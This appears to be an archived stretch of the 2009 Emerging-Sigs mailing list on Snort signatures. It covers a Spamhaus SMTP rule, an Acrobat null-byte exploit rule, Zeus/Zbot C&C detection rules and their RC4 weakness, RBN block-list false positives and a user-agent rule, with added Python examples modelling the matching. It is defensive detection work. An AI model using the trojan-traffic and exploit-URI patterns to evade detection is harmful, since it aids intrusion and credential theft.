Date: Mon, 4 May 2009 16:55:49 +0200
Subject: [Emerging-Sigs] IP
address on Spamhaus (Spam BlackList)
Message-ID: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>

Hi!

I've been analyzing some spam traffic, related to Snort's rule:

policy.rules:alert tcp $SMTP_SERVERS 25 -> $EXTERNAL_NET any (msg:"POLICY SMTP relaying denied"; flow:established,from_server; content:"550 5.7.1"; depth:70; reference:arachnids,249; reference:url,mail-abuse.org/tsi/ar-fix.html; classtype:misc-activity; sid:567; rev:11;)

We could write a rule to detect SMTP responses like this:

553 Mail from *.*.* not allowed - 5.7.1 [BL23] Connections not accepted from IP addresses on Spamhaus XBL; see http://postmaster.yahoo.com/550-bl23.html[550]

alert tcp $EXTERNAL_NET 25 -> $HOME_NET any (msg:"ET POLICY IP address BlackListed (Spamhaus)"; flow:established,from_server; content:"553 Mail from"; content:"Spamhaus XBL"; classtype:misc-activity; sid:; rev:1;)

Regards

--
_______________________________
Jaime Blasco
www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com

From daniel.clemens at packetninjas.net Mon May 4 12:37:53 2009
From: daniel.clemens at packetninjas.net (Daniel Clemens)
Date: Mon, 4 May 2009 11:37:53 -0500
Subject: [Emerging-Sigs] EXPLOIT Adobe Acrobat Reader Malicious URL Null Byte - FP
Message-ID: <7F88BA38-13EF-4DFC-93B7-D5691CEFF367@packetninjas.net>

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "ET EXPLOIT Adobe Acrobat Reader Malicious URL Null Byte"; flow: to_server,established; uricontent:".pdf|00|"; nocase; reference:url,idefense.com/application/poi/display?id=126&type=vulnerabilities; reference:url,www.securiteam.com/windowsntfocus/5BP0D20DPW.html; reference:cve,2004-0629; classtype:attempted-admin; reference:url,doc.emergingthreats.net/bin/view/Main/2001217; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Adobe_Acrobat_BO; sid:2001217; rev:9;)

This rule only triggers on a URI request ending in .pdf followed by a null byte. This rule should trigger on overly long strings after the %00 byte within the request which would trigger the overflow in the ActiveX control. The way this rule is currently written opens itself up to a few false positives...

| Daniel Uriah Clemens
| Packetninjas L.L.C
| http://www.packetninjas.net
| c. 205.567.6850 | o. 866.267.8851

"The secret to creativity is knowing how to hide your sources" Einstein

From emerging at emergingthreats.net Mon May 4 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 4 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090504200011.CF7D94501B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon May 4 16:00:11 2009 [***]

[+++] Added rules: [+++]
2009300 - ET TROJAN Small.zon checkin (emerging-virus.rules)

[///] Modified active rules: [///]
2009288 - ET WEB PHP Attack Tool Revolt Scanner (emerging-web.rules)
2009296 - ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin (emerging-virus.rules)
2009297 - ET TROJAN Boaxxe HTTP POST Checkin (emerging-virus.rules)
2009298 - ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan (emerging-scan.rules)
2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)
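The content matching behind Jaime's proposed Spamhaus rule and the null-byte rule in Daniel's note, modelled in Python as an added example (not code from either poster, from Emerging Threats or from Snort). It assumes a hypothetical 256-byte tail threshold for the tightened null-byte check, a 192.0.2.10 placeholder address in the sample reply, and models only percent-decoding of the URI rather than full http_inspect normalization.

```python
"""Offline model of the Snort content matching behind the rules discussed above.

Constructed example for this thread, not code from the Emerging Threats
project or from Snort: it mimics the content / nocase / depth semantics the
rules rely on so their coverage (and the false-positive point about sid
2001217) can be checked against sample payloads without a sensor.
"""
from urllib.parse import unquote_to_bytes


def parse_content(spec):
    """Turn a Snort content string such as '.pdf|00|' into raw bytes.
    Text between pipe characters is hex; everything else is literal."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        if i % 2 == 1:                      # inside |..|: hex bytes
            out.extend(bytes.fromhex(part))
        else:
            out.extend(part.encode("latin-1"))
    return bytes(out)


def content_matches(payload, spec, nocase=False, depth=None):
    """Snort-style content match: the pattern must occur somewhere in the
    payload, and within the first `depth` bytes when depth is given."""
    needle = parse_content(spec)
    hay = payload if depth is None else payload[:depth]
    if nocase:
        needle, hay = needle.lower(), hay.lower()
    return needle in hay


# Each rule is an ordered list of (content, options).  Without distance/within
# modifiers every content is matched independently against the whole payload.
SMTP_RULES = {
    # Snort sid 567 as quoted by Jaime: "550 5.7.1" must sit in the first 70 bytes.
    "sid 567 POLICY SMTP relaying denied": [("550 5.7.1", {"depth": 70})],
    # Jaime's proposed rule: two unanchored contents, both required.
    "ET POLICY IP address BlackListed (Spamhaus)": [
        ("553 Mail from", {}), ("Spamhaus XBL", {}),
    ],
}


def evaluate_smtp(response):
    """Return the names of the SMTP rules that would fire on one server reply."""
    return {name for name, contents in SMTP_RULES.items()
            if all(content_matches(response, spec, **opts) for spec, opts in contents)}


# Hypothetical threshold for "overly long string after the null byte"; in a
# Snort rule this is what isdataat:<N>,relative after the uricontent expresses.
MIN_TAIL_AFTER_NUL = 256


def evaluate_uri(raw_uri):
    """Evaluate sid 2001217 as written and a tightened variant on a request URI.
    Only percent-decoding is modelled here (assumption); http_inspect does more."""
    uri = unquote_to_bytes(raw_uri)
    as_written = content_matches(uri, ".pdf|00|", nocase=True)
    tightened = False
    if as_written:
        idx = uri.lower().find(b".pdf\x00")
        tail = len(uri) - (idx + len(b".pdf\x00"))
        tightened = tail >= MIN_TAIL_AFTER_NUL
    return {"sid_2001217": as_written, "tightened": tightened}


# Constructed sample traffic (RFC 5737 documentation address, no real hosts).
SMTP_XBL = (b"553 Mail from 192.0.2.10 not allowed - 5.7.1 [BL23] Connections not "
            b"accepted from IP addresses on Spamhaus XBL; see "
            b"http://postmaster.yahoo.com/550-bl23.html[550]\r\n")
SMTP_RELAY_DENIED = b"550 5.7.1 Unable to relay for user@example.com\r\n"
SMTP_OK = b"250 2.0.0 Ok: queued as 4F2A1\r\n"
# Multi-line reply: the decisive "550 5.7.1" line starts after byte 70,
# so depth:70 on sid 567 stops it firing.
SMTP_MULTILINE = b"550-" + b"x" * 70 + b"\r\n550 5.7.1 Relaying denied\r\n"

URI_BENIGN = b"/docs/quarterly-report.pdf"
URI_NUL_SHORT = b"/docs/report.PDF%00.html"          # fires as written, short tail
URI_NUL_LONG = b"/docs/report.pdf%00" + b"A" * 400   # long tail after the NUL

if __name__ == "__main__":
    for sample in (SMTP_XBL, SMTP_RELAY_DENIED, SMTP_OK, SMTP_MULTILINE):
        print(sample[:40], "->", evaluate_smtp(sample) or "no alert")
    for sample in (URI_BENIGN, URI_NUL_SHORT, URI_NUL_LONG):
        print(sample[:30], "->", evaluate_uri(sample))
```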
From cunningpike at gmail.com Mon May 4 18:58:38 2009
From: cunningpike at gmail.com (CunningPike)
Date: Mon, 04 May 2009 15:58:38 -0700
Subject: [Emerging-Sigs] [Fwd: 180/8 and 183/8 allocated to APNIC]
Message-ID: <1241477918.17573.6.camel@arodgers-panasonic>

-------- Forwarded Message --------
> From: Leo Vegoda
> To: Leo Vegoda
> Subject: 180/8 and 183/8 allocated to APNIC
> Date: Thu, 30 Apr 2009 15:03:57 -0700
>
> Hi,
>
> The IANA IPv4 registry has been updated to reflect the allocation
> of two /8 IPv4 blocks to APNIC in April 2009: 180/8 and 183/8.
You can > find the IANA IPv4 registry at: > > http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml > http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml > http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt > > Please update your filters as appropriate. > > Regards, > > Leo Vegoda > Number Resources Manager, IANA > > -----BEGIN PGP SIGNATURE----- > Version: 9.10.0.500 > > wj8DBQFJ+iBAvBLymJnAzRwRAq59AKDYIE9QGQAAJQDuqfQ5Qqo5YiZwWwCg1RNg > wwnJkpL3STZw9fDOM7zUToM= > =PtJl > -----END PGP SIGNATURE----- > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090504/97f5968d/attachment.bin From jonkman at jonkmans.com Mon May 4 22:20:57 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 04 May 2009 22:20:57 -0400 Subject: [Emerging-Sigs] Positions Available Message-ID: <49FFA289.3010802@jonkmans.com> I'm happy to announce that we're ready to start hiring and coding for the new OISF IPS Engine!! Funding is coming around and work is set to begin. We have a great deal to do, so we're soliciting a number of positions. Some are full time, some part time, and some project/task based. How each fits is partly up to the the person we find with the prerequisite skills, and what fits into their schedule. Please contact us at team at openinfosecfoundation.org if you or someone you know might fit into the following positions and has some availability this year: Coders: Some IPS and/or network coding experience preferred, but we welcome cross-discipline (i.e. high speed computing, multi-threading, etc) experience as well. There will be a number of positions from full time through the entire project (1-2 years) to part time and task based work. If you're interested please contact us! 
(If you've already committed to work please shoot me a line and let me know how your near-term schedule looks) Project Manager: We need the consulting services of a professional project manager. This will preferably be a part time consulting role to assist in plan design and high level oversight. More positions will be coming around very soon so please stay tuned! The Open Information Security Foundation Team! http://www.openinfosecfoundation.org -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Mon May 4 22:23:30 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 04 May 2009 22:23:30 -0400 Subject: [Emerging-Sigs] [Fwd: 180/8 and 183/8 allocated to APNIC] In-Reply-To: <1241477918.17573.6.camel@arodgers-panasonic> References: <1241477918.17573.6.camel@arodgers-panasonic> Message-ID: <49FFA322.8030804@jonkmans.com> Got it, thanks Pike! Matt CunningPike wrote: > -------- Forwarded Message -------- >> From: Leo Vegoda >> To: Leo Vegoda >> Subject: 180/8 and 183/8 allocated to APNIC >> Date: Thu, 30 Apr 2009 15:03:57 -0700 >> > Hi, > > The IANA IPv4 registry has been updated to reflect the allocation > of two /8 IPv4 blocks to APNIC in April 2009: 180/8 and 183/8. You can > find the IANA IPv4 registry at: > > http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml > http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml > http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt > > Please update your filters as appropriate. 
> > Regards, > > Leo Vegoda > Number Resources Manager, IANA > >> >> >> ------------------------------------------------------------------------ >> _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From daniel.clemens at packetninjas.net Tue May 5 01:24:40 2009 From: daniel.clemens at packetninjas.net (Daniel Clemens) Date: Tue, 5 May 2009 00:24:40 -0500 Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures Message-ID: alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST"; flow:established,to_server;content:"POST";depth:5; content:"|e5 c6 80 37 55 67 da e5|";flowbits:noalert;flowbits:set,Zlob.POST; reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1;) alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response"; flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67 da e5 1a 21 71 4c|"; content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|";content:"| b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|"; flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx ; rev:1;) Similarities in initial POSTS: -------------- next part -------------- A non-text attachment was scrubbed... Name: Similarities-Signature.png Type: image/png Size: 57963 bytes Desc: not available Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/9518b96b/Similarities-Signature-0001.png -------------- next part -------------- Responses: -------------- next part -------------- A non-text attachment was scrubbed... 
Name: response-diffs.tiff Type: image/tiff Size: 42522 bytes Desc: not available Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/9518b96b/response-diffs-0001.tiff -------------- next part -------------- Other links which include information about Zbot,Zues,WsPoem: http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621 http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html Older Historical Quotes for context: Botnet-controlled Trojan robbing online bank customers Security firm says malware targeting commercial customers believed to have come from Russia By Ellen Messmer, Network World, 12/13/07 "It's been very successful since we've first seen this at the end of November," says Don Jackson, senior security researcher at SecureWorks, which believes the Prg Trojan variant is designed by the Russian hackers group known as Russian UpLevel working with some German affiliates. | Daniel Uriah Clemens | Packetninjas L.L.C | | http://www.packetninjas.net | c. 205.567.6850 | | o. 866.267.8851 "The secret to creativity is knowing how to hide your sources" Einstein -------------- next part -------------- A non-text attachment was scrubbed... 
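Added example, not from the thread: the rules above key on fixed ciphertext bytes, and this Python shows why a content match lifted from one Zeus-style RC4 capture only fires for traffic encrypted under that same key. The bot header, the two botnet keys and the report bodies are constructed stand-ins, not real Zeus values.

```python
"""Why a content match on Zeus-style RC4 traffic is tied to one key.

Added example, not code from the thread. RC4 is the textbook cipher;
the bot header, the two botnet keys and the report bodies are
constructed stand-ins, not real Zeus values.
"""
from typing import Iterator, Sequence, Tuple


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Textbook RC4: key-scheduling algorithm, then the PRGA keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encrypt/decrypt (XOR with the keystream; the operation is symmetric)."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


# Constructed stand-in for a fixed record header that every bot sends at the
# start of each POST. It is what makes "similar bytes" show up across captures
# from the same botnet: constant plaintext XOR constant keystream.
BOT_HEADER = b"\x00\x00\x00\x28BOTID-REPORT\x01\x00"
REPORTS = [b"machine-1 stolen form data", b"machine-2 system info"]


def content_match(signature: bytes, payload: bytes) -> bool:
    """Snort-style content:"|..|": the fixed bytes anywhere in the payload."""
    return signature in payload


def signature_from_capture(key: bytes, sig_len: int = 8) -> bytes:
    """What a rule author lifts from one capture: the first ciphertext bytes of
    an encrypted POST body. Because the header is constant, these bytes are
    header XOR keystream(key), i.e. a fingerprint of the key, not of the bot."""
    return rc4(key, BOT_HEADER + REPORTS[0])[:sig_len]


def detection_rate(signature: bytes, key: bytes, reports: Sequence[bytes]) -> float:
    """Fraction of POSTs encrypted under `key` that the signature fires on."""
    hits = sum(content_match(signature, rc4(key, BOT_HEADER + r)) for r in reports)
    return hits / len(reports)


def demo() -> Tuple[float, float]:
    """Detection on the captured botnet's key versus another botnet's key."""
    key_captured = b"botnet-key-CONSTRUCTED-1"
    key_other = b"botnet-key-CONSTRUCTED-2"   # same malware, different operator
    sig = signature_from_capture(key_captured)
    return (detection_rate(sig, key_captured, REPORTS),
            detection_rate(sig, key_other, REPORTS))


if __name__ == "__main__":
    same_key, other_key = demo()
    print(f"same key: {same_key:.0%} of POSTs matched; other key: {other_key:.0%}")
```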
From thierry.chich at ac-clermont.fr Tue May 5 04:29:59 2009
From: thierry.chich at ac-clermont.fr (Thierry CHICH)
Date: Tue, 5 May 2009 10:29:59 +0200
Subject: [Emerging-Sigs] Rar detection coming from china
Message-ID: <200905051029.59792.thierry.chich@ac-clermont.fr>

Yesterday, on the net I manage, all the bad rar downloaded by trojans are coming from this unique address 221.1.204.243.
Is that something to think about? Is "China netcom" considered in the same way some russian providers are?

--
Thierry CHICH
Equipe Réseaux / Rectorat de Clermont-Ferrand
Tel: +33 4 73 99 30 54


From dxp2532 at gmail.com Tue May 5 10:07:08 2009
From: dxp2532 at gmail.com (dxp)
Date: Tue, 05 May 2009 10:07:08 -0400
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
Message-ID: <1241532428.6818.7.camel@kinta>

Daniel,

I think these signatures will have many False Negatives due to the fact that they will be detecting only the trojan which you've obtained traffic captures from. Zeus versions 1.2.x.x use RC4 encryption in all C&C communication thus data will only match for those which use the same key.

The reason why there are similar bytes in three of the captures is due to same header in all those POSTs which are encrypted with the same key. Once the key is changed, which is unique per botnet and can easily change at the will of the botmaster, the signatures won't provide detection.

Basically, from the perspective of IDS it only sees random bytes in the POST. The only thing which is static is the minimum amount of bytes which must be present for a valid record. However, within those bytes there's nothing unique.

-
-=[ dxp ]=-
0xA3F3C6E3

On Tue, 2009-05-05 at 00:24 -0500, Daniel Clemens wrote:
>
> alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST"; flow:established,to_server; content:"POST"; depth:5; content:"|e5 c6 80 37 55 67 da e5|"; flowbits:noalert; flowbits:set,Zlob.POST; reference:url,www.packetninjas.net/?p=586; classtype:trojan-activity; sid:xxx; rev:1;)
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response"; flow:established,to_client; content:"|29 69 7f 1f e5 c6 80 37 5f 67 da e5 1a 21 71 4c|"; content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|"; content:"|b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|"; flowbits:isset,Zlob.POST; reference:url,www.packetninjas.net/?p=586; classtype:trojan-activity; sid:xxx; rev:1;)
>
> Similarities in initial POSTS:
>
> Responses:
>
> Other links which include information about Zbot,Zues,WsPoem:
> http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
> http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
> http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
> http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
> http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
> http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
> http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html
>
> Older Historical Quotes for context:
> Botnet-controlled Trojan robbing online bank customers
> Security firm says malware targeting commercial customers believed to have come from Russia
> By Ellen Messmer, Network World, 12/13/07
>
> "It's been very successful since we've first seen this at the end of November," says Don Jackson, senior security researcher at SecureWorks, which believes the Prg Trojan variant is designed by the Russian hackers group known as Russian UpLevel working with some German affiliates.


From scheidell at secnap.net Tue May 5 12:36:52 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Tue, 05 May 2009 12:36:52 -0400
Subject: [Emerging-Sigs] RBN blocks blocking indian registrar mitsu.in
Message-ID: <4A006B24.2080005@secnap.net>

looks like your RBN block lists are blocking the .in registrar.

not a good idea.

grep 67.15.47.4 /var/log/snort.log
May 5 12:23:19 scanner snort[14078]: [1:2407153:127] ET RBN Known Russian Business Network Monitored Domains - BLOCKING (154) [Classification: Misc Attack] [Priority: 2]: {TCP} 67.15.47.4:80

host www.mitsu.in
www.mitsu.in is an alias for indiandomains.supersite.myorderbox.com.
indiandomains.supersite.myorderbox.com has address 67.15.184.7

also, 67.15.47.7 67.15.47.3.. (their dns servers)

--
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
SECNAP Network Security Corporation

* Certified SNORT Integrator
* 2008-9 Hot Company Award Winner, World Executive Alliance
* Five-Star Partner Program 2009, VARBusiness
* Best Anti-Spam Product 2008, Network Products Guide
* King of Spam Filters, SC Magazine 2008

_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r).
For Information please see http://www.secnap.com/products/spammertrap/
_________________________________________________________________________


From scheidell at secnap.net Tue May 5 12:44:40 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Tue, 05 May 2009 12:44:40 -0400
Subject: [Emerging-Sigs] RBN blocks blocking indian registrar mitsu.in
In-Reply-To: <4A006B24.2080005@secnap.net>
References: <4A006B24.2080005@secnap.net>
Message-ID: <4A006CF8.2090809@secnap.net>

this one also:

grep 67.15.184 /var/log/snort.log
May 5 12:18:03 scanner snort[14078]: [1:2407152:127] ET RBN Known Russian Business Network Monitored Domains - BLOCKING (153) [Classification: Misc Attack] [Priority: 2]: {TCP} 67.15.184.7:80 -> 10.70.3.3:50548

Michael Scheidell wrote:
> looks like your RBN block lists are blocking the .in registrar.
>
> not a good idea.
>
> grep 67.15.47.4 /var/log/snort.log
> May 5 12:23:19 scanner snort[14078]: [1:2407153:127] ET RBN Known Russian Business Network Monitored Domains - BLOCKING (154) [Classification: Misc Attack] [Priority: 2]: {TCP} 67.15.47.4:80
>
> host www.mitsu.in
> www.mitsu.in is an alias for indiandomains.supersite.myorderbox.com.
> indiandomains.supersite.myorderbox.com has address 67.15.184.7
>
> also, 67.15.47.7 67.15.47.3.. (their dns servers)


From nate+emerging at richmond-family.org Tue May 5 13:28:08 2009
From: nate+emerging at richmond-family.org (Nathaniel Richmond)
Date: Tue, 5 May 2009 13:28:08 -0400 (EDT)
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft Internet Explorer)
Message-ID: <20090505172808.51FD1A402B@medusa.richmond-family.org>

SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host: live.com" because of the preceding dot in the negation for vmware.com and live.com. I'm getting some non-malicious hits on this signature. I believe vmware may use this as a user-agent when checking for updates from a Windows host.

Removing the leading dot would allow something like fakevmware.com, but an alternative is to modify by adding 'content:!"Host|3A| vmware.com"', for example.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Suspicious User Agent (Microsoft Internet Explorer)"; flow: to_server,established; content:"User-Agent\: Microsoft Internet Explorer"; content:!"bbc.co.uk"; nocase; content:!"microsoft.com"; nocase; content:!".vmware.com"; nocase; content:!"msn.com"; nocase; content:!".live.com"; nocase; threshold:type limit, track by_src, count 2, seconds 360; reference:url,www.topinstalls.com; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2002400; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents; sid:2002400; rev:16;)


From emerging at emergingthreats.net Tue May 5 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 5 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090505200010.AD6EC4504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue May 5 16:00:10 2009 [***]

[///] Modified active rules: [///]

 2002750 - ET POLICY Reserved IP Space Traffic - Bogon Nets 2 (emerging-policy.rules)

[+++] Added non-rule lines: [+++]

 -> Added to emerging-sid-msg.map (2):
 2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
 2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

 -> Added to emerging-sid-msg.map.txt (2):
 2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
 2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From frank at knobbe.us Tue May 5 16:45:45 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 05 May 2009 15:45:45 -0500
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft Internet Explorer)
In-Reply-To: <20090505172808.51FD1A402B@medusa.richmond-family.org>
References: <20090505172808.51FD1A402B@medusa.richmond-family.org>
Message-ID: <1241556345.45824.19.camel@localhost>

On Tue, 2009-05-05 at 13:28 -0400, Nathaniel Richmond wrote:
> SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host: live.com" because of the preceding dot in the negation for vmware.com and live.com. I'm getting some non-malicious hits on this signature. I believe vmware may use this as a user-agent when checking for updates from a Windows host.
>
> Removing the leading dot would allow something like fakevmware.com, but an alternative is to modify by adding 'content:!"Host|3A| vmware.com"', for example.
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Suspicious User Agent (Microsoft Internet Explorer)"; flow: to_server,established; content:"User-Agent\: Microsoft Internet Explorer"; content:!"bbc.co.uk"; nocase; content:!"microsoft.com"; nocase; content:!".vmware.com"; nocase; content:!"msn.com"; nocase; content:!".live.com"; nocase; threshold:type limit, track by_src, count 2, seconds 360; reference:url,www.topinstalls.com; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2002400; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents; sid:2002400; rev:16;)

There are many other sites that could be added as well, since I believe a popular RSS reader uses that user agent.

Perhaps it is time for that signature to be removed? Do I hear a second?

Cheers,
Frank

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
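Added example, not from the thread: a small Python model of the content / content:! semantics behind Nathaniel's observation, run over constructed HTTP requests. It shows the posted negations missing "Host: vmware.com", his proposed exact-header negation closing that gap while still alerting on fakevmware.com, and the no-leading-dot variant he rejected excluding fakevmware.com as well. Snort matching is modelled as case-insensitive substring search over the whole request; flow, threshold and http_* modifiers are ignored.

```python
"""Negated content matching and the leading-dot gap in SID 2002400.

Added example, not code from the thread. Snort's content:"..." and
content:!"..." with nocase are modelled as case-insensitive substring
tests over the whole request; flow, threshold and http_* modifiers
are ignored. The HTTP requests below are constructed samples.
"""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Rule:
    """The content:"..."; nocase and content:!"..."; nocase keywords of one rule."""
    must_contain: List[bytes]
    must_not_contain: List[bytes] = field(default_factory=list)

    def matches(self, payload: bytes) -> bool:
        p = payload.lower()
        if not all(c.lower() in p for c in self.must_contain):
            return False
        # A negated content fails the rule as soon as its bytes appear anywhere.
        return not any(c.lower() in p for c in self.must_not_contain)


UA = b"User-Agent: Microsoft Internet Explorer"

# SID 2002400 rev 16 as posted, reduced to its UA match and its negations.
ORIGINAL = Rule(
    [UA],
    [b"bbc.co.uk", b"microsoft.com", b".vmware.com", b"msn.com", b".live.com"],
)
# Nathaniel's suggestion: keep the dotted negations and add the exact header
# (his content:!"Host|3A| vmware.com"; |3A| is the hex escape for the colon).
PROPOSED = Rule(
    [UA],
    ORIGINAL.must_not_contain + [b"Host: vmware.com", b"Host: live.com"],
)
# The alternative he rejected: drop the leading dot from the negations.
NO_DOT = Rule(
    [UA],
    [b"bbc.co.uk", b"microsoft.com", b"vmware.com", b"msn.com", b"live.com"],
)


def request(host: str, path: str = "/") -> bytes:
    """Constructed GET carrying the suspicious User-Agent to the given host."""
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\n".encode() + UA + b"\r\n\r\n"


SAMPLES: Dict[str, bytes] = {
    "apex": request("vmware.com", "/update/check"),    # legitimate, apex domain
    "www": request("www.vmware.com"),                  # legitimate, subdomain
    "fake": request("fakevmware.com", "/dl.exe"),      # should still alert
    "other": request("example.invalid", "/gate.php"),  # should still alert
}


def evaluate(rule: Rule) -> Dict[str, bool]:
    """Which of the constructed requests the rule would alert on."""
    return {name: rule.matches(req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for label, rule in (("original", ORIGINAL), ("proposed", PROPOSED), ("no_dot", NO_DOT)):
        print(label, evaluate(rule))
```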
Name: not available Type: application/pgp-signature Size: 188 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/acc6f252/attachment.bin From cunningpike at gmail.com Tue May 5 18:19:36 2009 From: cunningpike at gmail.com (CunningPike) Date: Tue, 05 May 2009 15:19:36 -0700 Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft Internet Explorer) In-Reply-To: <1241556345.45824.19.camel@localhost> References: <20090505172808.51FD1A402B@medusa.richmond-family.org> <1241556345.45824.19.camel@localhost> Message-ID: <1241561976.15728.2.camel@arodgers-panasonic> On Tue, 2009-05-05 at 15:45 -0500, Frank Knobbe wrote: > On Tue, 2009-05-05 at 13:28 -0400, Nathaniel Richmond wrote: > > SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host: > > live.com" because of the preceding dot in the negation for > > vmware.com and live.com. I'm getting some non-malicious hits on this > > signature. I believe vmware may use this as a user-agent when > > checking for updates from a Windows host. > There are many other sites that 